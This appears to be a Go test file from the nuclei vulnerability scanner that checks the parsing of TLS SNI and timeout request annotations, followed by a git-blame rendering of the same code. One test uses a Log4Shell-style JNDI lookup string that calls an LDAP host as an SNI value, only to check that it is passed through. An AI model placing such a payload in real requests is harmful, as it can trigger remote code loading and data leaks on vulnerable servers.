nuclei/pkg/protocols/http/request_annotations_test.go

package http

import (
	"context"
	"net/http"
	"testing"

	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/http/httpclientpool"
	"github.com/projectdiscovery/retryablehttp-go"
	"github.com/stretchr/testify/require"
)

func TestRequestParseAnnotationsSNI(t *testing.T) {
	t.Run("compliant-SNI-value", func(t *testing.T) {
		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
		rawRequest := `@tls-sni: github.com
		GET / HTTP/1.1
		Host: {{Hostname}}`

		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
		require.Nil(t, err, "could not create http request")

		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
		require.True(t, modified, "could not apply request annotations")
		require.Equal(t, "github.com", overrides.request.TLS.ServerName)
		require.Equal(t, "example.com", overrides.request.Host)
	})
	t.Run("non-compliant-SNI-value", func(t *testing.T) {
		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
		rawRequest := `@tls-sni: ${jndi:ldap://${hostName}.test.com}
		GET / HTTP/1.1
		Host: {{Hostname}}`

		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
		require.Nil(t, err, "could not create http request")

		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
		require.True(t, modified, "could not apply request annotations")
		require.Equal(t, "${jndi:ldap://${hostName}.test.com}", overrides.request.TLS.ServerName)
		require.Equal(t, "example.com", overrides.request.Host)
	})
}

func TestRequestParseAnnotationsTimeout(t *testing.T) {
	t.Run("positive", func(t *testing.T) {
		request := &Request{
			connConfiguration: &httpclientpool.Configuration{NoTimeout: true},
		}
		rawRequest := `@timeout: 2s
		GET / HTTP/1.1
		Host: {{Hostname}}`

		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
		require.Nil(t, err, "could not create http request")

		overrides, modified := request.parseAnnotations(rawRequest, httpReq)
		require.NotNil(t, overrides.cancelFunc, "could not initialize valid cancel function")
		require.True(t, modified, "could not get correct modified value")
		_, deadlined := overrides.request.Context().Deadline()
		require.True(t, deadlined, "could not get set request deadline")
	})

	t.Run("negative", func(t *testing.T) {
		request := &Request{
			connConfiguration: &httpclientpool.Configuration{},
		}
		rawRequest := `GET / HTTP/1.1
		Host: {{Hostname}}`

		httpReq, err := retryablehttp.NewRequestWithContext(context.Background(), http.MethodGet, "https://example.com", nil)
		require.Nil(t, err, "could not create http request")

		newRequestWithOverrides, modified := request.parseAnnotations(rawRequest, httpReq)
		require.Nil(t, newRequestWithOverrides.cancelFunc, "cancel function should be nil")
		require.False(t, modified, "could not get correct modified value")
		_, deadlined := newRequestWithOverrides.request.Context().Deadline()
		require.False(t, deadlined, "could not get set request deadline")
	})
}
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`package http`

			`import (`
			`"context"`
			`"net/http"`
			`"testing"`

nuclei v3 : misc updates (#4247) * use parsed options while signing * update project layout to v3 * fix .gitignore * remove example template * misc updates * bump tlsx version * hide template sig warning with env * js: retain value while using log * fix nil pointer derefernce * misc doc update --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-10-17 17:44:13 +05:30			`"github.com/projectdiscovery/nuclei/v3/pkg/protocols/http/httpclientpool"`
fix url encoding issues and inconsistencies (#3211) * fix url encoding issues * complete requested changes and improvements * fix missing issue-tracker-config.yaml * fuzz: deepcopy and use urlutil.Params 2023-01-24 22:04:52 +05:30			`"github.com/projectdiscovery/retryablehttp-go"`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`"github.com/stretchr/testify/require"`
			`)`

http: support arbitrary strings on TLS SNI annotation (#4462) 2023-12-06 09:45:30 +01:00			`func TestRequestParseAnnotationsSNI(t *testing.T) {`
			`t.Run("compliant-SNI-value", func(t *testing.T) {`
			`req := &Request{connConfiguration: &httpclientpool.Configuration{}}`
			rawRequest := `@tls-sni: github.com
			`GET / HTTP/1.1`
			Host: {{Hostname}}`

			`httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)`
			`require.Nil(t, err, "could not create http request")`

			`overrides, modified := req.parseAnnotations(rawRequest, httpReq)`
			`require.True(t, modified, "could not apply request annotations")`
			`require.Equal(t, "github.com", overrides.request.TLS.ServerName)`
Remove singletons from Nuclei engine (continuation of #6210) (#6296) * introducing execution id * wip * . * adding separate execution context id * lint * vet * fixing pg dialers * test ignore * fixing loader FD limit * test * fd fix * wip: remove CloseProcesses() from dev merge * wip: fix merge issue * protocolstate: stop memguarding on last dialer delete * avoid data race in dialers.RawHTTPClient * use shared logger and avoid race conditions * use shared logger and avoid race conditions * go mod * patch executionId into compiled template cache * clean up comment in Parse * go mod update * bump echarts * address merge issues * fix use of gologger * switch cmd/nuclei to options.Logger * address merge issues with go.mod * go vet: address copy of lock with new Copy function * fixing tests * disable speed control * fix nil ExecuterOptions * removing deprecated code * fixing result print * default logger * cli default logger * filter warning from results * fix performance test * hardcoding path * disable upload * refactor(runner): uses `Warning` instead of `Print` for `pdcpUploadErrMsg` Signed-off-by: Dwi Siswanto <git@dw1.io> * Revert "disable upload" This reverts commit 114fbe6663361bf41cf8b2645fd2d57083d53682. * Revert "hardcoding path" This reverts commit cf12ca800e0a0e974bd9fd4826a24e51547f7c00. --------- Signed-off-by: Dwi Siswanto <git@dw1.io> Co-authored-by: Mzack9999 <mzack9999@protonmail.com> Co-authored-by: Dwi Siswanto <git@dw1.io> Co-authored-by: Dwi Siswanto <25837540+dwisiswant0@users.noreply.github.com> 2025-07-09 14:47:26 -05:00			`require.Equal(t, "example.com", overrides.request.Host)`
http: support arbitrary strings on TLS SNI annotation (#4462) 2023-12-06 09:45:30 +01:00			`})`
			`t.Run("non-compliant-SNI-value", func(t *testing.T) {`
			`req := &Request{connConfiguration: &httpclientpool.Configuration{}}`
			rawRequest := `@tls-sni: ${jndi:ldap://${hostName}.test.com}
			`GET / HTTP/1.1`
			Host: {{Hostname}}`

			`httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)`
			`require.Nil(t, err, "could not create http request")`

			`overrides, modified := req.parseAnnotations(rawRequest, httpReq)`
			`require.True(t, modified, "could not apply request annotations")`
			`require.Equal(t, "${jndi:ldap://${hostName}.test.com}", overrides.request.TLS.ServerName)`
Remove singletons from Nuclei engine (continuation of #6210) (#6296) * introducing execution id * wip * . * adding separate execution context id * lint * vet * fixing pg dialers * test ignore * fixing loader FD limit * test * fd fix * wip: remove CloseProcesses() from dev merge * wip: fix merge issue * protocolstate: stop memguarding on last dialer delete * avoid data race in dialers.RawHTTPClient * use shared logger and avoid race conditions * use shared logger and avoid race conditions * go mod * patch executionId into compiled template cache * clean up comment in Parse * go mod update * bump echarts * address merge issues * fix use of gologger * switch cmd/nuclei to options.Logger * address merge issues with go.mod * go vet: address copy of lock with new Copy function * fixing tests * disable speed control * fix nil ExecuterOptions * removing deprecated code * fixing result print * default logger * cli default logger * filter warning from results * fix performance test * hardcoding path * disable upload * refactor(runner): uses `Warning` instead of `Print` for `pdcpUploadErrMsg` Signed-off-by: Dwi Siswanto <git@dw1.io> * Revert "disable upload" This reverts commit 114fbe6663361bf41cf8b2645fd2d57083d53682. * Revert "hardcoding path" This reverts commit cf12ca800e0a0e974bd9fd4826a24e51547f7c00. --------- Signed-off-by: Dwi Siswanto <git@dw1.io> Co-authored-by: Mzack9999 <mzack9999@protonmail.com> Co-authored-by: Dwi Siswanto <git@dw1.io> Co-authored-by: Dwi Siswanto <25837540+dwisiswant0@users.noreply.github.com> 2025-07-09 14:47:26 -05:00			`require.Equal(t, "example.com", overrides.request.Host)`
http: support arbitrary strings on TLS SNI annotation (#4462) 2023-12-06 09:45:30 +01:00			`})`
			`}`

Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`func TestRequestParseAnnotationsTimeout(t *testing.T) {`
			`t.Run("positive", func(t *testing.T) {`
			`request := &Request{`
			`connConfiguration: &httpclientpool.Configuration{NoTimeout: true},`
			`}`
			rawRequest := `@timeout: 2s
			`GET / HTTP/1.1`
			Host: {{Hostname}}`

fix url encoding issues and inconsistencies (#3211) * fix url encoding issues * complete requested changes and improvements * fix missing issue-tracker-config.yaml * fuzz: deepcopy and use urlutil.Params 2023-01-24 22:04:52 +05:30			`httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.Nil(t, err, "could not create http request")`

adding interactsh support to sni (#3276) 2023-02-07 09:32:10 +01:00			`overrides, modified := request.parseAnnotations(rawRequest, httpReq)`
			`require.NotNil(t, overrides.cancelFunc, "could not initialize valid cancel function")`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.True(t, modified, "could not get correct modified value")`
adding interactsh support to sni (#3276) 2023-02-07 09:32:10 +01:00			`_, deadlined := overrides.request.Context().Deadline()`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.True(t, deadlined, "could not get set request deadline")`
			`})`

			`t.Run("negative", func(t *testing.T) {`
			`request := &Request{`
			`connConfiguration: &httpclientpool.Configuration{},`
			`}`
			rawRequest := `GET / HTTP/1.1
			Host: {{Hostname}}`

fix url encoding issues and inconsistencies (#3211) * fix url encoding issues * complete requested changes and improvements * fix missing issue-tracker-config.yaml * fuzz: deepcopy and use urlutil.Params 2023-01-24 22:04:52 +05:30			`httpReq, err := retryablehttp.NewRequestWithContext(context.Background(), http.MethodGet, "https://example.com", nil)`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.Nil(t, err, "could not create http request")`

adding interactsh support to sni (#3276) 2023-02-07 09:32:10 +01:00			`newRequestWithOverrides, modified := request.parseAnnotations(rawRequest, httpReq)`
			`require.Nil(t, newRequestWithOverrides.cancelFunc, "cancel function should be nil")`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.False(t, modified, "could not get correct modified value")`
adding interactsh support to sni (#3276) 2023-02-07 09:32:10 +01:00			`_, deadlined := newRequestWithOverrides.request.Context().Deadline()`
Fixed request annotation based timeout bugs + tests + misc (#2476) 2022-08-23 12:45:55 +05:30			`require.False(t, deadlined, "could not get set request deadline")`
			`})`
			`}`